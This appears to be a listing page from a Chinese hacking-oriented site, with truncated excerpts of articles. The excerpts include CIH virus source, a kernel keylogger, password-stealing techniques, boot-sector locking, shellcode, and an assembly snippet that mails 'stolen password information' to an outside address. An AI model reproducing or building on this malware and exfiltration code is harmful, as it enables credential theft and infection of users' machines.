返回首页

  • CIH源代码 下 点击:214 好评:-2

    ; *************************** ; * Let's Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] push eax ; Size push edx ; Pointer of File push esi ; Address of Buffer ; ******...

  • 非法探取密码的原理及其防范 点击:97 好评:0

    一、非法获取Password的原理: Edit控件是Windows的一个标准控件,当把其Password属性设为True时,就会将输入的内容屏蔽为星号,从而达到保护的目的。虽然我们看来都是星号,但程序中的Edit控件实际仍是用户输入的密码,应用程序可以获取该控件中的密码,其他应用程序也...

  • 根据IP头格式 写sniff 点击:340 好评:0

    所以我整理了一些网络基础知识,放在这里。为什么我们不写一个自己的sniff呢?让我们从开始一起努力,写些自己的小工具。 先是常用的IP头格式。 IP头格式 =========== 版本号 (4位) IP头长度 (4位) 服务类型 (8位) 数据包长度 (16位) 标识段 (16位) 标志段 (16位) 生存...

  • Java源码:URL编程 点击:291 好评:0

    Example 1 Below is a simple Java program which can get the hostname of a computer from IP address. download now Tips 1. Compile: javac GetHost 2. Run: java GetHost 111.111.111.1(your IP or others) import java.io.*; import java.net.*; // // // GetHost...

  • 书写基于内核的linux键盘纪录器 上 点击:406 好评:0

    --[ Contents 1 - 介绍 2 - linux的keyboard驱动是如何工作的 3 - 基于内核的键盘纪录的原理 3.1 - 中断句柄 3.2 - 函数劫持 3.2.1 - 劫持handle_scancode 3.2.2 - 劫持put_queue 3.2.3 - 劫持receive_buf 3.2.4 - 劫持tty_read 3.2.5 - 劫持sys_read/sys_write 4 - vlo...

  • 书写基于内核的linux键盘纪录器 下 点击:485 好评:-2

    --[ 5 - 感谢 感谢plasmoid, skyper的大力帮助,感谢THC,vnsecurity等组织的所有朋友们。 最后,感谢thang先生的英文翻译。 //e4gle add 到此,全文介绍完了,大家有兴趣可以试试代码,其实这里涉及的技术无非还是系统调用和内核函数 的劫持技术,我整理过的一篇tty劫...

  • Windows 2000下的Raw Socket编程 点击:944 好评:-2

    Windows2000在TCP/IP协议组件上做了很多改进,功能也有增强。比如在协议栈上的调整,增大了默认窗口大小,以及高延迟链接新算法。同时在安全性上,可应用IPSec加强安全性,比NT下有不少的改进。 Microsoft TCP/IP 组件包含“核心协议”、“服务”及两者之间的“接口”...

  • 利用江民锁原理写的一个硬盘锁程序 点击:387 好评:0

    我在前一段时间写了一个硬盘锁,拿出来和大家交流交流,同时有个问题,希望大家能帮我想想。 首先,大略介绍一下我的程序,我是用汇编写成,程序有2个文件:hdboot.exe、hdboot.dat ,其中hdboot.dat是我写的用于装入硬盘0柱0道1扇的硬盘锁,hdboot.exe实现 (1)把hdboo...

  • windows下生成shell的一种新方法(1) 点击:120 好评:0

    hell实际上就是一小段可执行程序,有代码段、数据段和堆栈。只不过这段程序在内存中的位置只有在程序执行时才能确定,而在编译时并不能知道,这就给我们的编程带来了不少麻烦,数据不好定位与赋值。UNIX下的jmp、call定位在我的VC上好像不太行;而数据的赋值一般用mov b...

  • 利用汇编发送无需认证的eMail 点击:107 好评:1

    whginclude win32.inc .586 .model flat,stdcall .data SmtpSrvr db 'smtp.elong.com',0 MailFrom0 db 'qqspy2000@elong.com',0 RcptTo0 db 'qqspy2000@elong.com',0 From0 db 'QQSpy2000.@elong.com',0 To0 db 'QQSpy2000.@elong.com',0 Subject0 db '被盗密码信息',0...